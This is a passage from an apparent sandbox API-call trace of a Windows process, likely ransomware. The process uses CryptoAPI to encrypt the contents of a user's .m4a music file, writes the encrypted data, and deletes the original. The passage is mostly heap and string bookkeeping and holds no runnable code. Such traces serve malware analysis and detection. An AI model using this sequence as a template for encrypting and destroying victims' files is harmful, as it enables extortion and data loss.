dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0116.008] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0116.008] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e2890, pdwDataLen=0x144ddb0, dwFlags=0x0 | out: pbData=0x43e2890*=0x6610, pdwDataLen=0x144ddb0*=0x4) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0116.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.010] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea490 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.010] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.010] PeekMessageW (in: lpMsg=0x144e3e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e3e4) returned 0 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0440 | out: hHeap=0x1780000) returned 1 [0116.010] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0116.011] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0116.011] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0116.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.011] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0116.011] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.012] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0116.012] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e2e0*=0x132ef, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e2e0*=0x132f0) returned 1 [0116.053] CharLowerBuffW (in: lpsz="byte[78577]", cchLength=0xb | out: lpsz="byte[78577]") returned 0xb [0116.056] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.056] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.056] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0116.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cae68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0116.057] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ad300*, pdwDataLen=0x144e2e0*=0x132ef, dwBufLen=0x132f0 | out: pbData=0x49ad300*, pdwDataLen=0x144e2e0*=0x132f0) returned 1 [0116.057] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.057] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.059] WriteFile (in: hFile=0x298, lpBuffer=0x4529308*, nNumberOfBytesToWrite=0x132f0, lpNumberOfBytesWritten=0x144ece4, lpOverlapped=0x0 | out: lpBuffer=0x4529308*, lpNumberOfBytesWritten=0x144ece4*=0x132f0, lpOverlapped=0x0) returned 1 [0116.061] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0116.061] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0116.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0116.062] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0116.062] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.062] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0116.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0116.062] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0116.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.062] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0116.062] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0116.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.062] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0116.062] CryptReleaseContext (hProv=0x41a4728, dwFlags=0x0) returned 1 [0116.062] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0116.062] FreeLibrary (hLibModule=0x756e0000) returned 1 [0116.062] CloseHandle (hObject=0x258) returned 1 [0116.062] CloseHandle (hObject=0x298) returned 1 [0116.069] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a", nBufferLength=0x7fff, lpBuffer=0x143ece0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a", lpFilePart=0x0) returned 0x41 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0116.069] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\zmkzmhlwmmpv7lz.m4a")) returned 0x20 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0116.069] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0116.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0116.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0116.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359c08 [0116.070] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0116.070] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688891c0, ftCreationTime.dwHighDateTime=0x1d5ebe0, ftLastAccessTime.dwLowDateTime=0xc9dd75c0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0xc9dd75c0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x132ef, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="zMKZMHlWmMpV7lZ.m4a", cAlternateFileName="ZMKZMH~1.M4A")) returned 0x41ac200 [0116.070] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\zMKZMHlWmMpV7lZ.m4a" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\zmkzmhlwmmpv7lz.m4a")) returned 1 [0116.118] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x688891c0, ftCreationTime.dwHighDateTime=0x1d5ebe0, ftLastAccessTime.dwLowDateTime=0xc9dd75c0, ftLastAccessTime.dwHighDateTime=0x1d5ecfe, ftLastWriteTime.dwLowDateTime=0xc9dd75c0, ftLastWriteTime.dwHighDateTime=0x1d5ecfe, nFileSizeHigh=0x0, nFileSizeLow=0x132ef, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="zMKZMHlWmMpV7lZ.m4a", cAlternateFileName="ZMKZMH~1.M4A")) returned 0 [0116.118] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0116.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0116.118] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0116.119] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0116.119] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 1 [0116.119] TranslateMessage 